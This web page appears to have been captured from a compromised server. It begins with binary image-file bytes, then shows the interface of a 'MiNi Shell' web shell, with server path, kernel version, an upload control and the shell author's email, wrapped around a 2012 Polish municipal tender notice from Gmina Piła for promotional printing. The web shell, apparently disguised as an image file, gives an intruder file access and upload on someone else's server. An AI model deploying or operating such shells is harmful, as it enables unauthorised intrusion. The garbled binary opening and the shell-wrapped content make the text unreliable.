JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120308/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120308/54499-N-2012.html

<p class="kh_header"><b>Piła: sukcesywne projektowanie,druk i dostawa materiałów promocyjno- reklamowych</b><br>
<b>Numer ogłoszenia: 54499 - 2012; data zamieszczenia: 08.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Piła , Pl. Staszica 10, 64-920 Piła, woj. wielkopolskie, tel. 067 2126210, faks 067 2123566.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.pila.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> sukcesywne projektowanie,druk i dostawa materiałów promocyjno- reklamowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> sukcesywne projektowanie, druk i dostawa materiałów promocyjno-informacyjnych.
GRUPA 1
1) Wizytówki (próbka)
- format 90x50 mm,
- druk jednostronny kolor 4+0,
- papier satyna 350 g/m kw,
- pakowane po 100 sztuk w kartoniku z logo UM PIŁA (technika znakowania dowolna),
- nakład: 200 sztuk po 50 wzorów - zamawiane sukcesywnie według zapotrzebowania.

2) Papier firmowy - urzędowy (próbka)
- format A4 (210x297 mm),
- druk jednostronny kolor  4+0,
- papier preprint 90 g/m kw, 
- nakład: 
- 1 edycja po 10.000 szt.,
- 1 edycja po 40.000 szt. 

3) Plakaty 
- format A3 (297x420 mm),
- druk jednostronny kolor 4+0,
- papier powlekany biały 130-135 g/m kw,
- nakład:
- 5 edycji po 10 szt.,
- 3 edycje po 25 szt.,
- 2 edycje po 50 szt.

4) Plakaty (próbka)
- format A2 (420x594 mm),
- druk jednostronny kolor 4+0,
- papier powlekany biały 130-135 g/m kw,
- nakład:
- 5 edycji po 10 szt.,
- 3 edycje po 25 szt.,
- 2 edycje po 50 szt.

5) Plakaty 
- format A1 (594x841 mm),
- druk jednostronny kolor 4+0,
- papier powlekany biały 130-135 g/m kw,
- nakład:
- 5 edycji po 10 szt.,
- 3 edycje po 25 szt.,
- 2 edycje po 50 szt. 

6) Ulotki (próbka)
- format 444x210 mm, składne do formatu A5, łamane w C,
- druk dwustronny kolor 4+4,
- papier 170 g/m kw kreda mat, biały,
- lakier dyspersyjny,
- nakład:
- 6 edycji po 28.000 szt.,
- 2 edycje po 170.000 szt.

7) Ulotki (próbka)
- format 444x297 mm, składane do formatu A5, łamane w C,
- druk dwustronny kolor 4+4,
- papier 170 g/m kw kreda mat, biały,
- lakier dyspersyjny,
- nakład:
- 3 edycje po 28.000 szt.,
- 1 edycje po 170.000 szt.

8) Ulotki 
- format A4 (210x297 mm) łamane do DL, łamane w C,
- druk dwustronny kolor 4+4,
- papier 130- 135  g/m, kreda połysk, biały
- lakier dyspersyjny,
nakład: 1 edycje po 130.000 szt
                         1 edycja po 200 000 szt

9) Ulotki 
- format A4 (210x297 mm) łamane do A5,
- druk dwustronny kolor 4+4,
- papier 150  g/m, kreda połysk,
- lakier dyspersyjny,
nakład: 2 edycje po 30.000 szt
                      
9) Zaproszenia Biura Prezydenta 
- format 297x105 mm łamane do A6,
- druk dwustronny kolor 4+4,
- papier 300 g/m kw, satyna, ivory / kość słoniowa,
- tłoczenie (suchy stempel) -  1 miejsce,
- nakład: 
- 2 edycje po 100 szt.,
- 2 edycje po 200 szt.,
- 2 edycje po 300 szt.,
- 2 edycje po 500 szt.

9) Zaproszenia z herbem (próbka)
- format 297x105 mm łamane do A6,
- druk dwustronny kolor 4+4,
- papier 300 g/m kw, satyna, biały,
- nakład:
* 2 edycje po 100 szt.,
* 2 edycje po 200 szt.,
* 2 edycje po 300 szt.,
* 2 edycje po 500 szt.

11) Zaproszenia bez herbu -próbka
- format 297x105 mm łamane do A6,
- druk dwustronny kolor 4+4,
- papier 300 g/m kw, satyna, biały, 
- nakład:
- 2 edycje po 100 szt., 
- 2 edycje po 200 szt., 
- 2 edycje po 300 szt., 
- 2 edycje po 500 szt. 

GRUPA 2
1) Roll up (próbka wydruku - minimum 40x40 cm)
- kaseta aluminiowa z 2 nóżkami + pokrowiec,
- format powierzchni zadruku 85x200 cm,
- druk wysokiej jakości, minimum 1440 dpi, pigmentowy,
- poliprop outdoor - baner 200 mic,
- druk jednostronny kolor, 4+0,
nakład: 10 szt.

2) Billboardy (próbka wydruku - minimum 40x40 cm)
- format 504x238 cm,
- druk jednostronny kolor, 4+0,
- papier blueback 130 g/m,
nakład: 10 szt.

3) Banery (próbka wydruku - minimum 40x40 cm)
- format 2x1 m,
- druk jednostronny kolor, 4+0,
- medium: frontlit 510 g/m,
- oczkowanie standard (co 50 cm),
- nakład: 25 szt.

4) Tablice informacyjne A1 (próbka wydruku - minimum 40x40 cm)
- format A1, PCV spienione 4 mm,
- druk na foli monometrycznej lub bezpośrednio na nośniku 4+0,
- nakład: 8 edycji po 5 szt.

5) Tabliczki okolicznościowe (próbka)
- tabliczki grawerowane/frezowane,
- na laminacie grawerskim - kolor złoty, litery czarne, format A5,
- podkład drewniany lub drewnopodobny mahoń lub wiśnia,
- nakład: 10 edycji po 1 szt. 

6) Tabliczki okolicznościowe
- tabliczki grawerowane/frezowane,
- na laminacie grawerskim - kolor złoty, litery czarne, format A4,
- podkład drewniany lub drewnopodobny mahoń lub wiśnia,
- nakład: 5 edycji po 1 szt.

7) Koperty (próbka)
- format DL (220x110 mm) bez okienka,
- druk jednostronny kolor 4+0,
- papier biały, środek niebieski,
- SK samoprzylepne bez paska,
- nakład: 1 edycja - 5.000 szt.

8) Koperty
- format C4 (229x324 mm) bez okienka,
- druk jednostronny kolor 4+0,
- papier biały, środek niebieski,
- SK samoprzylepne bez paska,
- nakład: 1 edycja - 2.000 szt.

GRUPA 3 

1) Notesy
- format A4 (210x297 mm),
- druk jednostronny kolor 4+0,
- papier biały offsetowy 90 g/m kw,
- 25 kart w bloku,
- z dwoma dziurkami (dostosowane do standardowych segregatorów),
- klejone od góry po krótszym boku,
- tektura na spód,
- nakład: 1 edycja - 500 szt.

2) Teczka ofertowa (próbka)
- format A4+,
- wymiary przed złożeniem: w zakresie szerokość 485-495 mm, wysokość 335-340 mm,
- wymiary po złożeniu: w zakresie szerokość 215-220 mm, wysokość 300-305 mm,
- 1 bigowa,
- papier kreda mat 350 g/m kw,
- druk 4+0 + lakier dyspersyjny + lakier wybiórczy UV,
- nakład: 
* 1 edycja - 1.000 szt.,
* 1 edycja - 10.000 szt.

3) Teczki ofertowa Miasto Piła
- format A4+,
- wymiary przed złożeniem: w zakresie szerokość 485-495 mm, wysokość 335-340 mm,
- wymiary po złożeniu: w zakresie szerokość 215-220 mm, wysokość 300-305 mm,
- 1 bigowa,
- papier kreda mat 350 g/m kw,
- druk 4+0 + lakier dyspersyjny + lakier wybiórczy UV,
- nakład: 1 edycja - 1.000 szt.

GRUPA 4 
1) Flagi (próbka minimum 40x40 cm)
- flaga formatu B2, obszyta,
- druk 4+0,
- materiał: polyglans,
- nakład: 1 edycja - 30 szt.

2) Torby papierowe (przykładowe realizacje)
- format w zakresie: szerokość 220-230 mm, wysokość 300-310 mm, głębokość 90-100 mm,
- papier dwustronnie kredowany, 170 gram,
- zakładka górna min 35 mm,
- dno torby: usztywnione tekturą min 350 g/m kw,
- laminat mat,
- uchwyt: sznurek bawełniany, biały, min. 45 cm,
- druk jednostronny 4+0 offsetowy,
- wybiórczo lakier UV,
- nakład: 1 edycja - 1.000 szt.

3) Teczki sztywne skóropodobne (przykładowe realizacje)
- format w zakresie: szerokość 220-230 mm, wysokość 310-315 mm,
- kolor oprawy: zielony,
- logo tłoczone + złocenie,
- kolor wewnątrz: biały,
- uchwyt na dyplom,
- nakład: 1 edycja - 200 szt.

4) Teczka clipboardy A4 z PCV (przykładowe realizacje)
- clipboard A4+, z klamrą metalową,
- klip typu druciak,
- materiał: PCV,
- nadruk: 5+0,
- nakład: 1 edycja -200 szt.

5) Teczka clipboard A4 z PCV dwuskrzydłowa (przykładowe realizacje - jedna z teczek clipboard z nadrukiem)
- clipboard dwuskrzydłowy - format po złożeniu A4+, z klamrą metalową,
- klip typu druciak,
- materiał: PCV,
- nadruk: 5+0,
- nakład: 1 edycja - 50 szt.

GRUPA 5
- wykonanie projektów reklam prasowych, banerów na stronę www, w tym w wersji flesh, 
opracowanie prezentacji multimedialnych,
- łącznie: 250 roboczogodzin;
Projekty wykonywane będą na podstawie materiałów dostarczonych  przez Zleceniodawcę, który  posiada do nich autorskie prawa majątkowe.
Autorskie prawa majatkowe  do wykonywanych projektów w ramach umowy sa przekazwne nieodpłatnie na Gminę Piła w momencie odbioru przez  Zamawiajacego.

WYMAGANIA ZAMAWIAJĄCEGO:

Usługa graficzna: 
1) Wykonanie projektów na podstawie materiałów przekazanych przez Zamawiającego, do których Zamawiający posiada autorskie prawa majątkowe.
2) Wykonawca przenosi autorskie prawa majątkowe do wykonanych projektów w ramach umowy nieodpłatnie na Gminę Piła w momencie odbioru projektów przez Zamawiającego.

Czas reakcji Wykonawcy:
1) Odpowiedź Wykonawcy na wysłane zamówienie - 2 roboczogodziny.
2) Wykonanie projektu graficznego: 8 roboczogodzin od otrzymania materiałów od Zamawiającego.
3) Dostarczenie przez Wykonawcę wydruków próbnych (grupa 1 oraz grupa 3) - 8 roboczogodzin od akceptacji projektu przez Zamawiającego.
4) Realizacja zamówienia wraz z dostawą do Zamawiającego:
- grupa 1 i grupa 2 - 6 dni roboczych od akceptacji projektu i wzoru,
- grupa 3 i grupa 4 - 11 dni roboczych od akceptacji projektu i wzoru.

Próbki  materiałów
Wykonawca  dołączy do oferty próbki materiałów wskazane w specyfikacji, zostaną one wykonane na koszt Wykonawcy.
Zamówienia:
1) Zamówienia będą składane sukcesywnie według potrzeb Zamawiającego.
2) Wykonawca jest zobligowany do przestrzegania zapisów z Księgi znaku UM 
Zamawiającego, która jest załącznikiem do SIWZ.
3) Przypisane wielkości są planowanymi.
4) Zamówienia muszą być realizowane na materiałach przekazanych na próbkach i 
przykładowych realizacjach dołączonych do oferty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.82.25.00-7, 79.82.00.00-8, 79.82.30.00-9, 31.52.32.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Pełnomocnictwo do reprezentowania w postępowaniu, (w przypadku podmiotów występujących wspólnie) - przygotowane zgodnie z zapisami części VII pkt. 4 SIWZ. 
2) Parafowany projekt umowy  - załącznik nr 4 do SIWZ.
3) Wypełniona wycena materiałów promocyjno-informacyjnych - załącznik nr 6 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - jakość na podstawie dostarczonych próbek i przykładowych  realizacji - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pila.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.bip.pila.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2012 godzina 09:00, miejsce: siedziba Zamawiającego pok. 134  piętro I - Kancelaria Główna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com